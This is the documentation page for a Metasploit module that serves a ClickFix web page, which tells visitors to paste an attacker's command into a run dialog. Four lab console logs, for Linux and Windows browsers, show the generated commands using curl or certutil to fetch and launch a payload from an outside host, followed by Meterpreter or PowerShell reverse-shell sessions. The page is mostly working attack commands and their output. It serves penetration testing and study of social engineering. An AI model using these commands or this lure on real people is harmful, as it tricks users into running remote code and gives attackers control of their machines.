Path: blob/master/documentation/modules/exploit/multi/misc/clickfix_server.md
74576 views
Vulnerable Application
This creates a Web Server which hosts a ClickFix type exploit. When a user visits the site they are given instructions on pasting our payload into a run dialog.
When using a custom html page, please use INSERT_PAYLOAD_HERE as the spot to put the generated payload in.
Verification Steps
Start msfconsole
Do:
use exploit/multi/misc/clickfix_serverDo:
set target #Do:
set payload [payload]Do:
runVisit the website and follow the instructions. You should get a shell.
Options
SRVPORT
Web server port to use
TEMPLATE
Template type to use. Choice are auto and custom. custom value requires custom to have a HTML file path. Defaults to auto and uses a web browser update template.
CUSTOM
Path to HTML file to use
Scenarios
Linux Firefox 140.0
resource (/home/h00die/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/home/h00die/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 msf > use exploit/multi/misc/clickfix_server [*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp msf exploit(multi/misc/clickfix_server) > set target 1 target => 1 msf exploit(multi/misc/clickfix_server) > set payload payload/cmd/linux/http/x64/meterpreter/reverse_tcp payload => cmd/linux/http/x64/meterpreter/reverse_tcp msf exploit(multi/misc/clickfix_server) > set uripath clickfix uripath => clickfix msf exploit(multi/misc/clickfix_server) > exploit [*] Command to run on remote host: curl -so ./CVMLVEkTDkF http://1.1.1.1:8080/h21lOsiTyFK6CgBlUqDgZQ;chmod +x ./CVMLVEkTDkF;./CVMLVEkTDkF& [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. [*] Fetch handler listening on 1.1.1.1:8080 [*] HTTP server started [*] Adding resource /h21lOsiTyFK6CgBlUqDgZQ msf exploit(multi/misc/clickfix_server) > [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Using URL: http://1.1.1.1/clickfix [*] Server started. [*] 1.1.1.1 clickfix_server - Request /clickfix from Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0 [*] Client 1.1.1.1 requested /h21lOsiTyFK6CgBlUqDgZQ [*] Sending payload to 1.1.1.1 (curl/8.18.0) [*] Transmitting intermediate stager...(126 bytes) [*] Sending stage (3090404 bytes) to 1.1.1.1 [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 1.1.1.1:35658) at 2026-03-31 11:36:15 -0400 msf exploit(multi/misc/clickfix_server) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: h00die meterpreter > sysinfo Computer : kali OS : Debian (Linux 6.18.12+kali-amd64) Architecture : x64 BuildTuple : x86_64-linux-musl Meterpreter : x64/linux meterpreter > background [*] Backgrounding session 1...
Windows 10 Pro, Edge 146.0.0.0
resource (/home/h00die/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/home/h00die/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 msf > use exploit/multi/misc/clickfix_server [*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp msf exploit(multi/misc/clickfix_server) > set payload payload/cmd/windows/http/x64/powershell_reverse_tcp payload => cmd/windows/http/x64/powershell_reverse_tcp msf exploit(multi/misc/clickfix_server) > set uripath clickfix uripath => clickfix msf exploit(multi/misc/clickfix_server) > exploit [*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/1GCX5ZG1X0p1DW6ox6kAqA %TEMP%\VjyHKreJan.exe & start /B %TEMP%\VjyHKreJan.exe [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. msf exploit(multi/misc/clickfix_server) > [*] Fetch handler listening on 1.1.1.1:8080 [*] HTTP server started [*] Adding resource /1GCX5ZG1X0p1DW6ox6kAqA [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Using URL: http://1.1.1.1/clickfix [*] Server started. [*] 2.2.2.2 clickfix_server - Request /clickfix from Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 Edg/146.0.0.0 [*] Client 2.2.2.2 requested /1GCX5ZG1X0p1DW6ox6kAqA [*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0) [*] Client 2.2.2.2 requested /1GCX5ZG1X0p1DW6ox6kAqA [*] Sending payload to 2.2.2.2 (CertUtil URL Agent) [*] Powershell session session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55701) at 2026-03-31 12:08:43 -0400 msf exploit(multi/misc/clickfix_server) > sessions -i 1 [*] Starting interaction with 1... PS C:\Windows\system32> whoami DESKTOP-1GAUR72\h00die PS C:\Windows\system32> Get-ComputerInfo | Select-Object WindowsProductName, WindowsVersion, OsHardwareAbstractionLayer WindowsProductName WindowsVersion OsHardwareAbstractionLayer ------------------ -------------- -------------------------- Windows 10 Pro 2009 10.0.19041.6456
Windows 10 Pro, Chrome 146.0.0.0
resource (/home/h00die/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/home/h00die/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 msf > use exploit/multi/misc/clickfix_server [*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp msf exploit(multi/misc/clickfix_server) > set uripath clickfix uripath => clickfix msf exploit(multi/misc/clickfix_server) > exploit [*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/Jy5WA3Epc63uV93PB0rHzw %TEMP%\gXDMGfSOa.exe & start /B %TEMP%\gXDMGfSOa.exe [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. msf exploit(multi/misc/clickfix_server) > [*] Fetch handler listening on 1.1.1.1:8080 [*] HTTP server started [*] Adding resource /Jy5WA3Epc63uV93PB0rHzw [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Using URL: http://1.1.1.1/clickfix [*] Server started. [*] 2.2.2.2 clickfix_server - Request /clickfix from Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/146.0.0.0 Safari/537.36 [*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw [*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0) [*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw [*] Sending payload to 2.2.2.2 (CertUtil URL Agent) [*] Sending stage (232006 bytes) to 2.2.2.2 [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55757) at 2026-03-31 12:15:41 -0400 msf exploit(multi/misc/clickfix_server) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: DESKTOP-1GAUR72\h00die meterpreter > sysinfo Computer : DESKTOP-1GAUR72 OS : Windows 10 22H2+ (10.0 Build 19045). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter > background [*] Backgrounding session 1...
Windows 10 Pro, Firefox
resource (/home/h00die/.msf4/msfconsole.rc)> setg verbose true verbose => true resource (/home/h00die/.msf4/msfconsole.rc)> setg lhost 1.1.1.1 lhost => 1.1.1.1 msf > use exploit/multi/misc/clickfix_server [*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp msf exploit(multi/misc/clickfix_server) > set uripath clickfix uripath => clickfix msf exploit(multi/misc/clickfix_server) > exploit [*] Command to run on remote host: certutil -urlcache -f http://1.1.1.1:8080/Jy5WA3Epc63uV93PB0rHzw %TEMP%\lZCpTwOgv.exe & start /B %TEMP%\lZCpTwOgv.exe [*] Exploit running as background job 0. [*] Exploit completed, but no session was created. msf exploit(multi/misc/clickfix_server) > [*] Fetch handler listening on 1.1.1.1:8080 [*] HTTP server started [*] Adding resource /Jy5WA3Epc63uV93PB0rHzw [*] Started reverse TCP handler on 1.1.1.1:4444 [*] Using URL: http://1.1.1.1/clickfix [*] Server started. [*] 2.2.2.2 clickfix_server - Request /clickfix from Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:149.0) Gecko/20100101 Firefox/149.0 [*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw [*] Sending payload to 2.2.2.2 (Microsoft-CryptoAPI/10.0) [*] Client 2.2.2.2 requested /Jy5WA3Epc63uV93PB0rHzw [*] Sending payload to 2.2.2.2 (CertUtil URL Agent) [*] Sending stage (232006 bytes) to 2.2.2.2 [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:55832) at 2026-03-31 12:18:33 -0400 msf exploit(multi/misc/clickfix_server) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: DESKTOP-1GAUR72\h00die meterpreter > sysinfo Computer : DESKTOP-1GAUR72 OS : Windows 10 22H2+ (10.0 Build 19045). Architecture : x64 System Language : en_US Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter >